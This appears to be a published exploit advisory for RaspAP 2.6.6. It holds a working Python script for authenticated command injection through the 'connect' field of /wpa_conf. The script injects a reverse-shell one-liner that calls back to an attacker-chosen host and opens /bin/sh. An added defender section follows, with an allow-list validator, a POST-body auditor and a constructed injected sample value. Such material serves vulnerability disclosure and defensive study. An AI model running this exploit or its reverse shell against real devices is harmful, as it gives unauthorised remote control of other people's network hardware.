RaspAP 2.6.6 Remote Code Execution

2021.08.23
Credit: Moritz Gruber
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <moritz@aware7.de>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re

if len(sys.argv) != 7:
    print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
    sys.exit()
else:
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    username = sys.argv[3]
    password = sys.argv[4]
    listener_host = sys.argv[5]
    listener_port = sys.argv[6]

endpoint = "/wpa_conf"
exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

s = requests.Session()
get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
soup = BeautifulSoup(get_Request.text, "lxml")
csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")

post_data = {
    "csrf_token": csrf_token,
    "connect": "wlan; {}".format(exploit)
}
post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))

if post_Request.status_code:
    print("Exploit send.")
else:
    print("Something went wrong.")

print("Done")
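Defender-side view of the request above, as an added example that is not part of the original advisory or of RaspAP's code: an allow-list check for the "connect" form field, applied both when auditing POST bodies sent to /wpa_conf and at a hardened call site. The allowed character set, the 32-character limit and the helper name wpa-helper are assumptions made for the example, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Assumption for this example: a legitimate `connect` value is a short token of
# letters, digits, '_', '.' or '-'. Adjust to what the application really expects.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_safe_connect(value):
    """Allow-list check: the whole value must match, not just a prefix."""
    return SAFE_VALUE.fullmatch(value) is not None


def audit_post_body(body):
    """Return one finding per rejected `connect` value in a urlencoded body."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get("connect", []):
        if not is_safe_connect(value):
            # Characters outside the allow-list, deduplicated, for the alert text.
            extra = "".join(sorted(set(re.sub(r"[A-Za-z0-9_.-]", "", value))))
            findings.append({"field": "connect", "value": value, "unexpected": extra})
    return findings


def build_argv(tool, value):
    """Hardened call site: validate, then hand the value over as a single argv
    element (for subprocess.run(argv) without a shell). `tool` is hypothetical."""
    if not is_safe_connect(value):
        raise ValueError("rejected connect value: %r" % value)
    return [tool, value]


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "csrf_token=abc123&connect=wlan0",
    "csrf_token=abc123&connect=wlan%3B+id",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", audit_post_body(body) or "ok")
```

The same allow-list is used for detection and for enforcement, so a value that would raise an alert can never reach the command line.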

